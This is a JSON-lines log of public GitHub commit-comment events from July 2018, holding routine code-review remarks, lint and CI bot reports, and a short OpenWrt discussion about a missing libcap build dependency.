{"id":"8039578505","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"Azure/doAzureParallel"},"payload":{"comment":{"id":29891997,"position":null,"line":null,"path":null,"commit_id":"fd8b4ad3d25783a81b999a292edbcdacc2ba0900","created_at":"2018-07-30T18:47:34Z","updated_at":"2018-07-30T18:47:34Z","author_association":"NONE","body":"[R/cluster.R:127:28:](https://github.com/Azure/doAzureParallel/blob/fd8b4ad3d25783a81b999a292edbcdacc2ba0900/R/cluster.R#L127) *style:* **Use <-, not =, for assignment.**\n```r\n​    containerConfiguration = list(\n                           ^\n```\n[R/cluster.R:168:50:](https://github.com/Azure/doAzureParallel/blob/fd8b4ad3d25783a81b999a292edbcdacc2ba0900/R/cluster.R#L168) *style:* **Use <-, not =, for assignment.**\n```r\n​      containerConfiguration$containerRegistries = list(\n                                                 ^\n```"}},"created_at":"2018-07-30T18:47:34Z"}
{"id":"8039578898","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"serdar1980/spring"},"payload":{"comment":{"id":29892000,"position":10,"line":10,"path":"quiz/src/main/java/ru/serdar1980/condig/MaxValue.java","commit_id":"9889fb7e8dd6859e98d3756f4b4df4e69b6a5b6a","created_at":"2018-07-30T18:47:39Z","updated_at":"2018-07-30T18:47:39Z","author_association":"NONE","body":"Ну не очень название, если честно)) Совсем непонятная абстракция получается по названию."}},"created_at":"2018-07-30T18:47:39Z"}
{"id":"8039579993","type":"CommitCommentEvent","actor":{"login":"PSRCode"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29892003,"position":479,"line":479,"path":"tests/regression/tools/tracker/test_event_tracker","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T18:47:52Z","updated_at":"2018-07-30T18:47:52Z","author_association":"NONE","body":"Is it normal that this test is run 2 times ? A similar test if dounf on line 475"}},"created_at":"2018-07-30T18:47:52Z"}
{"id":"8039581440","type":"CommitCommentEvent","actor":{"login":"hansemannn"},"repo":{"name":"appcelerator/titanium_mobile"},"payload":{"comment":{"id":29892006,"position":21,"line":39,"path":"iphone/Classes/KrollCallback.h","commit_id":"c94458ac58dc633fcbe224e5da13cbf98e3a44e4","created_at":"2018-07-30T18:48:09Z","updated_at":"2018-07-30T18:48:09Z","author_association":"CONTRIBUTOR","body":"As this one was merged after the TiCore removal, this needs to be migrated manually. I've done that in my Swift branch but we may want to do this here as well."}},"created_at":"2018-07-30T18:48:09Z"}
{"id":"8039582520","type":"CommitCommentEvent","actor":{"login":"zoldello"},"repo":{"name":"ENCODE-DCC/encoded"},"payload":{"comment":{"id":29892010,"position":69,"line":69,"path":"src/encoded/tests/test_stage_one_searchview.py","commit_id":"04474ad6676c596331149a9412b1996125908611","created_at":"2018-07-30T18:48:20Z","updated_at":"2018-07-30T18:48:20Z","author_association":"CONTRIBUTOR","body":"This is a matter of personal style. From .NET, I learned unit test supposed to test one functionality and generally have only one or two asserts. This seems to be testing multiple things. If this fails, it is not painfully obvious from the name what failed, because multiple things are tested"}},"created_at":"2018-07-30T18:48:20Z"}
{"id":"8039582907","type":"CommitCommentEvent","actor":{"login":"PSRCode"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29892012,"position":489,"line":489,"path":"tests/regression/tools/tracker/test_event_tracker","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T18:48:25Z","updated_at":"2018-07-30T18:48:25Z","author_association":"NONE","body":"A similar test is done on line 487 is this normal?"}},"created_at":"2018-07-30T18:48:25Z"}
{"id":"8039583290","type":"CommitCommentEvent","actor":{"login":"johspaeth"},"repo":{"name":"CROSSINGTUD/CryptoAnalysis"},"payload":{"comment":{"id":29892013,"position":25,"line":51,"path":"CryptoAnalysisTargets/DataFlowImprecisionExample/src/main/DataFlowImprecisionExample.java","commit_id":"65e879e6ee2493ac47275cef30d883835247257e","created_at":"2018-07-30T18:48:29Z","updated_at":"2018-07-30T18:48:29Z","author_association":"COLLABORATOR","body":"Shouldn't it be `field` as parameter here?"}},"created_at":"2018-07-30T18:48:29Z"}
{"id":"8039588433","type":"CommitCommentEvent","actor":{"login":"PSRCode"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29892028,"position":446,"line":446,"path":"tests/regression/tools/tracker/test_event_tracker","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T18:49:26Z","updated_at":"2018-07-30T18:49:26Z","author_association":"NONE","body":"Similar test is done on line 442 is it normal ?"}},"created_at":"2018-07-30T18:49:26Z"}
{"id":"8039589126","type":"CommitCommentEvent","actor":{"login":"papandreou"},"repo":{"name":"hapijs/joi"},"payload":{"comment":{"id":29892032,"position":null,"line":null,"path":null,"commit_id":"02dc91a8d19815c41c46831cc708a0ea48752422","created_at":"2018-07-30T18:49:33Z","updated_at":"2018-07-30T18:49:33Z","author_association":"NONE","body":"@Marsup, there doesn't seem to be a v13.5.1 tag here. Did you to push it along with the release commit?"}},"created_at":"2018-07-30T18:49:33Z"}
{"id":"8039593078","type":"CommitCommentEvent","actor":{"login":"thuehn"},"repo":{"name":"openwrt/packages"},"payload":{"comment":{"id":29892050,"position":null,"line":null,"path":null,"commit_id":"0264b90152ea95b5d22062a9a6d6185a39f8b467","created_at":"2018-07-30T18:50:18Z","updated_at":"2018-07-30T18:50:18Z","author_association":"CONTRIBUTOR","body":"I got a compile error in OpenWrt for the mtr package, as libcap is missing as dependency. Here is my log:\r\n\r\nmake[2]: Entering directory '/Users/openwrt/feeds/packages/net/mtr'\r\nmkdir -p /Users/openwrt/staging_dir/target-x86_64_musl/root-x86/stamp\r\nSHELL= flock /Users/openwrt/tmp/.root-copy.flock -c 'cp -fpR /Users/openwrt/build_dir/target-x86_64_musl/mtr-0.92/.pkgdir/mtr/. /Users/openwrt/staging_dir/target-x86_64_musl/root-x86/'\r\ntouch /Users/openwrt/staging_dir/target-x86_64_musl/root-x86/stamp/.mtr_installed\r\nmkdir -p /Users/openwrt/bin/targets/x86/64/packages /Users/openwrt/build_dir/target-x86_64_musl/mtr-0.92/ipkg-x86_64/mtr/CONTROL /Users/openwrt/staging_dir/target-x86_64_musl/pkginfo\r\ninstall -d -m0755 /Users/openwrt/build_dir/target-x86_64_musl/mtr-0.92/ipkg-x86_64/mtr/usr/sbin\r\ninstall -m0755 /Users/openwrt/build_dir/target-x86_64_musl/mtr-0.92/ipkg-install/usr/sbin/mtr /Users/openwrt/build_dir/target-x86_64_musl/mtr-0.92/ipkg-x86_64/mtr/usr/sbin/\r\nfind /Users/openwrt/build_dir/target-x86_64_musl/mtr-0.92/ipkg-x86_64/mtr -name 'CVS' -o -name '.svn' -o -name '.#*' -o -name '*~'| xargs -r rm -rf\r\nPackage mtr is missing dependencies for the following libraries:\r\nlibcap.so.2\r\nmake[2]: *** [Makefile:81: /Users/openwrt/bin/packages/x86_64/packages/mtr_0.92-1_x86_64.ipk] Error 1\r\nmake[2]: Leaving directory '/Users/openwrt/feeds/packages/net/mtr'\r\nCommand exited with non-zero status 2\r\ntime: package/feeds/packages/mtr/compile#0.82#0.23#1.13\r\nmake[1]: *** [package/Makefile:109: package/feeds/packages/mtr/compile] Error 2\r\n\r\nWhen I manually change mtr makefile to add libcap:\r\nDEPENDS:=+libncurses +libcap\r\nmtr packages builds at least without compile errors.\r\n\r\nIs this the right solution ?\r\n\r\nGreetings Thomas"}},"created_at":"2018-07-30T18:50:18Z"}
{"id":"8039593406","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"serdar1980/spring"},"payload":{"comment":{"id":29892051,"position":7,"line":11,"path":"quiz/src/main/resources/application.yml","commit_id":"aba52c09bcefdeadd03a66721e2a2d022ca828a0","created_at":"2018-07-30T18:50:22Z","updated_at":"2018-07-30T18:50:22Z","author_association":"NONE","body":"А почему не создать banner.txt и не менять эту дефолтную настройку?"}},"created_at":"2018-07-30T18:50:22Z"}
{"id":"8039593750","type":"CommitCommentEvent","actor":{"login":"hunt82"},"repo":{"name":"neelabhpant/Deep-Learning-in-Python"},"payload":{"comment":{"id":29892052,"position":null,"line":null,"path":null,"commit_id":"4003f997eeb4accf51a11c6b01b5f7f59ac48474","created_at":"2018-07-30T18:50:25Z","updated_at":"2018-07-30T18:50:25Z","author_association":"NONE","body":"Hi,\r\nHow could i have future predictions , i mean , out of the bounds  of the test x range , for example future values a year later and so... "}},"created_at":"2018-07-30T18:50:25Z"}
{"id":"8039595109","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29892057,"position":null,"line":null,"path":null,"commit_id":"b7a698654b26efa15ef82b3ea4c2c846fd99bc1b","created_at":"2018-07-30T18:50:41Z","updated_at":"2018-07-30T18:50:41Z","author_association":"MEMBER","body":"Yeah, I have no goddamn clue what is going on. I rebased the entire sgc_if.cpp so that it is nearly identical to your version in sgc_if.cpp - and it still crashes with Reicast OIT at startup. Still the same UpdateAeg function call that causes it.\r\n\r\nHere is the diff -\r\n\r\nhttps://hastebin.com/wuwufizute.diff\r\n\r\nCan you test this on Windows x64? That is where I can consistently reproduce the crash on."}},"created_at":"2018-07-30T18:50:41Z"}
{"id":"8039596066","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29892059,"position":null,"line":null,"path":null,"commit_id":"f3699fdfe9889984047a97f29d97f9a58a23b3e1","created_at":"2018-07-30T18:50:52Z","updated_at":"2018-07-30T18:50:52Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-570](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-570).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-570-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-30T18:50:52Z"}
{"id":"8039597651","type":"CommitCommentEvent","actor":{"login":"jontsai"},"repo":{"name":"hacktoolkit/django-htk"},"payload":{"comment":{"id":29892066,"position":11,"line":88,"path":"static/htk/js/toolbar/emulate_user.js","commit_id":"a9c371bfc5e33a1180b5e2c9bd6520f58be341ec","created_at":"2018-07-30T18:51:09Z","updated_at":"2018-07-30T18:51:09Z","author_association":"MEMBER","body":"@ajnassar single quotes"}},"created_at":"2018-07-30T18:51:09Z"}
{"id":"8039603020","type":"CommitCommentEvent","actor":{"login":"jontsai"},"repo":{"name":"hacktoolkit/django-htk"},"payload":{"comment":{"id":29892080,"position":10,"line":87,"path":"static/htk/js/toolbar/emulate_user.js","commit_id":"a9c371bfc5e33a1180b5e2c9bd6520f58be341ec","created_at":"2018-07-30T18:52:10Z","updated_at":"2018-07-30T18:52:10Z","author_association":"MEMBER","body":"@ajnassar `SLIDE_DURATION`"}},"created_at":"2018-07-30T18:52:10Z"}
{"id":"8039603999","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"NikitaSharipov/lesson3"},"payload":{"comment":{"id":29892087,"position":36,"line":133,"path":"main.rb","commit_id":"9875cdb19e8d18fb4cc448ad146e6b0b8db4a39a","created_at":"2018-07-30T18:52:20Z","updated_at":"2018-07-30T18:52:20Z","author_association":"NONE","body":"не оптимально, лучше будет сначала найти поезд (пока можешь попробовать использовать метод select, а в след. уроке будет задание по реализации метода поиска поезда), чем проходить циклом по всем поездам. Это касается всех мест, где ты таким образом выбираешь нужный объект"}},"created_at":"2018-07-30T18:52:20Z"}
{"id":"8039604233","type":"CommitCommentEvent","actor":{"login":"jontsai"},"repo":{"name":"hacktoolkit/django-htk"},"payload":{"comment":{"id":29892089,"position":9,"line":86,"path":"static/htk/js/toolbar/emulate_user.js","commit_id":"a9c371bfc5e33a1180b5e2c9bd6520f58be341ec","created_at":"2018-07-30T18:52:23Z","updated_at":"2018-07-30T18:52:23Z","author_association":"MEMBER","body":"@ajnassar `ANIMATION_DELAY`"}},"created_at":"2018-07-30T18:52:23Z"}
{"id":"8039604620","type":"CommitCommentEvent","actor":{"login":"dmase44"},"repo":{"name":"dmase44/intro-to-git-2"},"payload":{"comment":{"id":29892090,"position":null,"line":null,"path":null,"commit_id":"848ae12cafc4894e2aaee00cc6ec27e950917970","created_at":"2018-07-30T18:52:28Z","updated_at":"2018-07-30T18:52:28Z","author_association":"OWNER","body":"merging changes made by Gonzo"}},"created_at":"2018-07-30T18:52:28Z"}
{"id":"8039605790","type":"CommitCommentEvent","actor":{"login":"jontsai"},"repo":{"name":"hacktoolkit/django-htk"},"payload":{"comment":{"id":29892095,"position":10,"line":87,"path":"static/htk/js/toolbar/emulate_user.js","commit_id":"a9c371bfc5e33a1180b5e2c9bd6520f58be341ec","created_at":"2018-07-30T18:52:41Z","updated_at":"2018-07-30T18:52:41Z","author_association":"MEMBER","body":"@ajnassar or `ANIMATION_DURATION`"}},"created_at":"2018-07-30T18:52:41Z"}
{"id":"8039607767","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29892100,"position":11,"line":11,"path":"Lesson_6/lib/validation.rb","commit_id":"4b73b09716a02c155bba385b979daaa7e24aec14","created_at":"2018-07-30T18:53:04Z","updated_at":"2018-07-30T18:53:04Z","author_association":"NONE","body":"когда \"бегин\" и \"энд\" совпадают с начлом и концом метода их опускают и оставляют только \"рескью\"\r\nздесь можно записать так:\r\n```ruby\r\n  def valid?\r\n    validate!\r\n    true\r\n  rescue\r\n    false\r\n  end\r\n```"}},"created_at":"2018-07-30T18:53:04Z"}
{"id":"8039608858","type":"CommitCommentEvent","actor":{"login":"PSRCode"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29892107,"position":456,"line":456,"path":"tests/regression/tools/tracker/test_event_tracker","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T18:53:16Z","updated_at":"2018-07-30T18:53:16Z","author_association":"NONE","body":"Similar test on line 454"}},"created_at":"2018-07-30T18:53:16Z"}
{"id":"8039610674","type":"CommitCommentEvent","actor":{"login":"zoldello"},"repo":{"name":"ENCODE-DCC/encoded"},"payload":{"comment":{"id":29892116,"position":94,"line":94,"path":"src/encoded/tests/test_stage_one_searchview.py","commit_id":"04474ad6676c596331149a9412b1996125908611","created_at":"2018-07-30T18:53:37Z","updated_at":"2018-07-30T18:53:37Z","author_association":"CONTRIBUTOR","body":"Do test method names suppose to map to the method name it test?"}},"created_at":"2018-07-30T18:53:37Z"}
{"id":"8039612299","type":"CommitCommentEvent","actor":{"login":"jontsai"},"repo":{"name":"hacktoolkit/django-htk"},"payload":{"comment":{"id":29892121,"position":9,"line":86,"path":"static/htk/js/toolbar/emulate_user.js","commit_id":"a9c371bfc5e33a1180b5e2c9bd6520f58be341ec","created_at":"2018-07-30T18:53:55Z","updated_at":"2018-07-30T18:53:55Z","author_association":"MEMBER","body":"@ajnassar actually I think you are using this as `FADE_DURATION`\r\n\r\nhttp://api.jquery.com/fadeTo/"}},"created_at":"2018-07-30T18:53:55Z"}
{"id":"8039614717","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29892125,"position":null,"line":null,"path":null,"commit_id":"2bf131f6a4becc89ac54f70b92b46ad2a59742b0","created_at":"2018-07-30T18:54:23Z","updated_at":"2018-07-30T18:54:23Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/2bf131f6a4becc89ac54f70b92b46ad2a59742b0/index.html"}},"created_at":"2018-07-30T18:54:23Z"}
{"id":"8039615529","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29892130,"position":null,"line":null,"path":null,"commit_id":"a5255e6fc41c06c7453520a634d54ff284b98595","created_at":"2018-07-30T18:54:33Z","updated_at":"2018-07-30T18:54:33Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/a5255e6fc41c06c7453520a634d54ff284b98595/index.html"}},"created_at":"2018-07-30T18:54:33Z"}
{"id":"8039619287","type":"CommitCommentEvent","actor":{"login":"kraileth"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29892143,"position":null,"line":null,"path":null,"commit_id":"5fef3d8b37a7e9fa61fab1afe2a41739d1552cf5","created_at":"2018-07-30T18:55:16Z","updated_at":"2018-07-30T18:55:16Z","author_association":"COLLABORATOR","body":"Then its fate is sealed."}},"created_at":"2018-07-30T18:55:16Z"}
{"id":"8039624028","type":"CommitCommentEvent","actor":{"login":"stevoisiak"},"repo":{"name":"rr-/screeninfo"},"payload":{"comment":{"id":29892155,"position":301,"line":168,"path":"screeninfo/screeninfo.py","commit_id":"379aae8d154088c5d43feabf1767e6124211b66c","created_at":"2018-07-30T18:56:11Z","updated_at":"2018-07-30T18:56:11Z","author_association":"CONTRIBUTOR","body":"If I understand correctly, the `_enumerate_x` functions act as platform-specific `get_monitors()` functions, correct?"}},"created_at":"2018-07-30T18:56:11Z"}
{"id":"8039624671","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29892156,"position":null,"line":null,"path":null,"commit_id":"494294b728244d0f123ea856a1b7b2a8fb400f2c","created_at":"2018-07-30T18:56:19Z","updated_at":"2018-07-30T18:56:19Z","author_association":"NONE","body":"#6868-EngRefEquationFixPart1 (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2952 of 2952 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-30T18:56:19Z"}
{"id":"8039626720","type":"CommitCommentEvent","actor":{"login":"zoldello"},"repo":{"name":"ENCODE-DCC/encoded"},"payload":{"comment":{"id":29892159,"position":146,"line":146,"path":"src/encoded/tests/test_stage_one_searchview.py","commit_id":"04474ad6676c596331149a9412b1996125908611","created_at":"2018-07-30T18:56:42Z","updated_at":"2018-07-30T18:56:42Z","author_association":"CONTRIBUTOR","body":"How does this test relate to the code?"}},"created_at":"2018-07-30T18:56:42Z"}
{"id":"8039632851","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29892180,"position":75,"line":1623,"path":"tests/utils/utils.sh","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T18:57:50Z","updated_at":"2018-07-30T18:57:50Z","author_association":"OWNER","body":"done"}},"created_at":"2018-07-30T18:57:50Z"}
{"id":"8039633435","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29892181,"position":76,"line":1624,"path":"tests/utils/utils.sh","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T18:57:55Z","updated_at":"2018-07-30T18:57:55Z","author_association":"OWNER","body":"done"}},"created_at":"2018-07-30T18:57:55Z"}
{"id":"8039633591","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"NikitaSharipov/lesson3"},"payload":{"comment":{"id":29892182,"position":38,"line":134,"path":"main.rb","commit_id":"9875cdb19e8d18fb4cc448ad146e6b0b8db4a39a","created_at":"2018-07-30T18:57:57Z","updated_at":"2018-07-30T18:57:57Z","author_association":"NONE","body":"хранить тип поезда теперь не обязательно, ты можешь определить его исходя из класса:\r\ntrain.is_a?(PassengerTrain)"}},"created_at":"2018-07-30T18:57:57Z"}
{"id":"8039634589","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/Products.statusmessages"},"payload":{"comment":{"id":29892185,"position":null,"line":null,"path":null,"commit_id":"9e63e42778e48520d313dcd06f049b4483cd1afc","created_at":"2018-07-30T18:58:09Z","updated_at":"2018-07-30T18:58:09Z","author_association":"NONE","body":"@agitator Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-Products.statusmessages/35/violations\n```\nProducts/statusmessages/tests/test_adapter.py:35:15: D001 found directlyProvides( replace it with zope.interface.provider\nProducts/statusmessages/tests/test_adapter.py:221:0: P102 docstring does contain unindexed parameters\nProducts/statusmessages/tests/test_adapter.py:241:15: D001 found directlyProvides( replace it with zope.interface.provider\nProducts/statusmessages/tests/test_adapter.py:308:0: P102 docstring does contain unindexed parameters\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-30T18:58:09Z"}
{"id":"8039634714","type":"CommitCommentEvent","actor":{"login":"nickv2002"},"repo":{"name":"sumpfork/dominiontabs"},"payload":{"comment":{"id":29892186,"position":null,"line":null,"path":null,"commit_id":"fa3c7c0556a2fd2ad9c3489d60bf4dc9700c3b91","created_at":"2018-07-30T18:58:11Z","updated_at":"2018-07-30T18:58:11Z","author_association":"COLLABORATOR","body":"Looks good!"}},"created_at":"2018-07-30T18:58:11Z"}
{"id":"8039635422","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29892189,"position":83,"line":1631,"path":"tests/utils/utils.sh","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T18:58:18Z","updated_at":"2018-07-30T18:58:18Z","author_association":"OWNER","body":"necessary or unnecessary ?"}},"created_at":"2018-07-30T18:58:18Z"}
{"id":"8039639161","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29892195,"position":526,"line":526,"path":"tests/regression/tools/tracker/test_event_tracker","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T18:59:01Z","updated_at":"2018-07-30T18:59:01Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-30T18:59:01Z"}
{"id":"8039640086","type":"CommitCommentEvent","actor":{"login":"rr-"},"repo":{"name":"rr-/screeninfo"},"payload":{"comment":{"id":29892202,"position":301,"line":168,"path":"screeninfo/screeninfo.py","commit_id":"379aae8d154088c5d43feabf1767e6124211b66c","created_at":"2018-07-30T18:59:12Z","updated_at":"2018-07-30T18:59:12Z","author_association":"OWNER","body":"Yes"}},"created_at":"2018-07-30T18:59:12Z"}
{"id":"8039640892","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29892207,"position":null,"line":null,"path":null,"commit_id":"9b04538a7f603fa4011f680d598065b79a4cc5aa","created_at":"2018-07-30T18:59:20Z","updated_at":"2018-07-30T18:59:20Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - i386-Windows-7-VisualStudio-14: OK (2952 of 2952 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9b04538a7f603fa4011f680d598065b79a4cc5aa-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9b04538a7f603fa4011f680d598065b79a4cc5aa-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-30T18:59:20Z"}
{"id":"8039641416","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29892208,"position":489,"line":489,"path":"tests/regression/tools/tracker/test_event_tracker","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T18:59:26Z","updated_at":"2018-07-30T18:59:26Z","author_association":"OWNER","body":"removing duplicate."}},"created_at":"2018-07-30T18:59:26Z"}
{"id":"8039641422","type":"CommitCommentEvent","actor":{"login":"jow-"},"repo":{"name":"openwrt/packages"},"payload":{"comment":{"id":29892209,"position":null,"line":null,"path":null,"commit_id":"0264b90152ea95b5d22062a9a6d6185a39f8b467","created_at":"2018-07-30T18:59:26Z","updated_at":"2018-07-30T18:59:26Z","author_association":"CONTRIBUTOR","body":"No, ideally we should find a —disable-libcap switch or similar to avoid the extra dep"}},"created_at":"2018-07-30T18:59:26Z"}
{"id":"8039643259","type":"CommitCommentEvent","actor":{"login":"Devoxin"},"repo":{"name":"Terminal/Discord_Fork"},"payload":{"comment":{"id":29892215,"position":null,"line":null,"path":null,"commit_id":"27112b441a39f0f619cfc1bae1d8e9922c2e678b","created_at":"2018-07-30T18:59:47Z","updated_at":"2018-07-30T18:59:47Z","author_association":"CONTRIBUTOR","body":"disgusting"}},"created_at":"2018-07-30T18:59:47Z"}
{"id":"8039643791","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29892217,"position":479,"line":479,"path":"tests/regression/tools/tracker/test_event_tracker","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T18:59:53Z","updated_at":"2018-07-30T18:59:53Z","author_association":"OWNER","body":"removing duplicate."}},"created_at":"2018-07-30T18:59:53Z"}
{"id":"8039646930","type":"CommitCommentEvent","actor":{"login":"Marsup"},"repo":{"name":"hapijs/joi"},"payload":{"comment":{"id":29892232,"position":null,"line":null,"path":null,"commit_id":"02dc91a8d19815c41c46831cc708a0ea48752422","created_at":"2018-07-30T19:00:27Z","updated_at":"2018-07-30T19:00:27Z","author_association":"MEMBER","body":"@papandreou fixed. It contained nothing."}},"created_at":"2018-07-30T19:00:27Z"}
{"id":"8039647150","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29892233,"position":null,"line":null,"path":null,"commit_id":"1bd5186f09ab7620b3790fcb8402ea27f0150f4c","created_at":"2018-07-30T19:00:30Z","updated_at":"2018-07-30T19:00:30Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-457](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-457).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-457-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-30T19:00:30Z"}
{"id":"8039647902","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29892236,"position":456,"line":456,"path":"tests/regression/tools/tracker/test_event_tracker","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T19:00:38Z","updated_at":"2018-07-30T19:00:38Z","author_association":"OWNER","body":"removing duplicate."}},"created_at":"2018-07-30T19:00:38Z"}
{"id":"8039648995","type":"CommitCommentEvent","actor":{"login":"kne42"},"repo":{"name":"cirruslabs/cirrus-ci-docs"},"payload":{"comment":{"id":29892239,"position":23,"line":39,"path":"docs/guide/windows.md","commit_id":"cfa5c8869a701614a96649cc2aa2288b0108adeb","created_at":"2018-07-30T19:00:51Z","updated_at":"2018-07-30T19:00:51Z","author_association":"NONE","body":"@fkorotkov Did you mean \"_syntactic_ sugar\"?"}},"created_at":"2018-07-30T19:00:51Z"}
{"id":"8039650462","type":"CommitCommentEvent","actor":{"login":"ringote"},"repo":{"name":"thiagosantos/Carrinho-Abandonado---Magento"},"payload":{"comment":{"id":29892247,"position":null,"line":null,"path":null,"commit_id":"fc1fce6e978e65cd20cdc14482e63049ffe58653","created_at":"2018-07-30T19:01:08Z","updated_at":"2018-07-30T19:01:08Z","author_association":"NONE","body":"Obrigado mano!\n\n\nHelio Gonzaga Santos Júnior\n\nDesenvolvedor Front-End\n\nContato: (11)94634-8975\n\n\n________________________________\nDe: Thiago Santos Pereira <notifications@github.com>\nEnviado: segunda-feira, 30 de julho de 2018 16:45\nPara: thiagosantos/Carrinho-Abandonado---Magento\nCc: Helio gonzaga; Mention\nAssunto: Re: [thiagosantos/Carrinho-Abandonado---Magento] novos arquivos adicionados (fc1fce6)\n\n\nBaixando o ZIP e extraindo na raiz do Magento.\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub<https://github.com/thiagosantos/Carrinho-Abandonado---Magento/commit/fc1fce6e978e65cd20cdc14482e63049ffe58653#commitcomment-29891956>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AZmPoIjVo4uCqfbZXGvmDEvuTqZQcoxHks5uL1REgaJpZM4Vm6nN>.\n"}},"created_at":"2018-07-30T19:01:08Z"}
{"id":"8039654155","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29892255,"position":446,"line":446,"path":"tests/regression/tools/tracker/test_event_tracker","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T19:01:51Z","updated_at":"2018-07-30T19:01:51Z","author_association":"OWNER","body":"removing dup."}},"created_at":"2018-07-30T19:01:51Z"}
